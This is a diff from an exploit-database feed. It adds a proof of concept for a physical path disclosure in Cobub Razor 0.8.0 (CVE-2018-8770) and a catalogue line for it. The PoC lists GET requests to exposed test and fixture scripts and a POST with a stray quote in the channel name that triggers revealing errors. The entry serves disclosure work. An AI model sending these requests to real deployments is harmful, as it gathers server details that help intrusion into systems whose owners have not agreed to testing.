DB: 2018-04-21

1 changes to exploits/shellcodes

Cobub Razor 0.8.0 - Physical path Leakage

exploits/php/webapps/44495.txt

@@ -0,0 +1,30 @@
+# Exploit Title:  Cobub Razor 0.8.0 Physical path Leakage Vulnerability
+# Date: 2018-04-19
+# Exploit Author: Kyhvedn
+# Vendor Homepage: http://www.cobub.com/
+# Software Link: https://github.com/cobub/razor
+# Version: 0.8.0
+# CVE : CVE-2018-8770
+
+#PoC:
+
+URL: http://localhost/export.php
+HTTP Method: GET
+URL: http://localhost/index.php?/manage/channel/addchannel
+HTTP Method: POST
+Data: channel_name=test"&platform=1
+
+HTTP Method: GET
+http://localhost/tests/generate.php
+http://localhost/tests/controllers/getConfigTest.php
+http://localhost/tests/controllers/getUpdateTest.php
+http://localhost/tests/controllers/postclientdataTest.php
+http://localhost/tests/controllers/posterrorTest.php
+http://localhost/tests/controllers/posteventTest.php
+http://localhost/tests/controllers/posttagTest.php
+http://localhost/tests/controllers/postusinglogTest.php
+http://localhost/tests/fixtures/Controller_fixt.php
+http://localhost/tests/fixtures/Controller_fixt2.php
+http://localhost/tests/fixtures/view_fixt2.php
+http://localhost/tests/libs/ipTest.php
+http://localhost/tests/models/commonDbfix.php

files_exploits.csv

@@ -39187,3 +39187,4 @@ id,file,description,date,author,type,platform,port
 44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80
 44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
 44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,
+44495,exploits/php/webapps/44495.txt,"Cobub Razor 0.8.0 - Physical path Leakage",2018-04-20,Kyhvedn,webapps,php,